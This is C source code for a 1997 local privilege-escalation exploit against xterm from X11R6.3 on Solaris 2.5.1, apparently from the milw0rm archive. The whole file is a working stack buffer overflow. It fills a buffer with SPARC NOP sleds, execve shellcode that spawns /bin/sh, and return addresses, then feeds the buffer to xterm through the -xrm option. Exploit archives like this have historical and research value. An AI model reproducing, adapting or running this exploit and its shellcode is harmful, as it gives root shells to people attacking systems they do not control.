/* * X11R6.3 xterm exploit for solaris 5.5.1 by DCRH 28/5/97 * */ #include #include #include #include #define EXTRA2 1300 #define BUF_LENGTH 400 #define EXTRA 500 /* Need an addr such that contents of addr+0xe98 = 0 */ #define SAFE_ADDR ((unsigned)0xefff2008) #define STACK_OFFSET 0x4800 #define SPARC_NOP 0xa61cc013 u_long sparc_shellcode[] = { 0x2d0bd89a, /* sethi %hi(0x2f626800), %l6 */ 0xac15a16e, /* or %l6, 0x16e, %l6 */ 0x2f0bdadc, /* sethi %hi(0x2f6b7000), %l7 */ 0xae15e368, /* or %l7, 0x368, %l7 */ 0x900b800e, /* and %sp, %sp, %o0 */ 0x9203a00c, /* add %sp, 0xc, %o1 */ 0x941ac00b, /* xor %o3, %o3, %o2 */ 0x9c03a014, /* add %sp, 0x14, %sp */ 0xec3bbfec, /* std %l6, [ %sp + -20 ] */ 0xc023bff4, /* clr [ %sp + -12 ] */ 0xdc23bff8, /* st %sp, [ %sp + -8 ] */ 0xc023bffc, /* clr [ %sp + -4 ] */ 0x8210203b, /* mov 0x3b, %g1 */ 0x91d02008, /* ta 8 */ 0xffffffff, /* illegal */ }; u_long get_sp(void) { asm("mov %sp,%i0 \n"); } char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8]; char longvar[0x4000] = "BLAH="; void main(int argc, char *argv[]) { char *env[2]; unsigned long targ_addr; u_long *long_p; int i, code_length = sizeof(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf; for (i = 0; i < EXTRA2 / sizeof(u_long); i++) *long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24); targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; for (i = 0; i < code_length / sizeof(u_long); i++) *long_p++ = sparc_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); /* This is just to shove the stack down a bit */ memset(&longvar[5], 'a', sizeof longvar-6); longvar[sizeof longvar -1] = '\0'; env[0] = longvar; env[1] = NULL; execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env); perror("execl failed"); } // milw0rm.com [1997-05-28]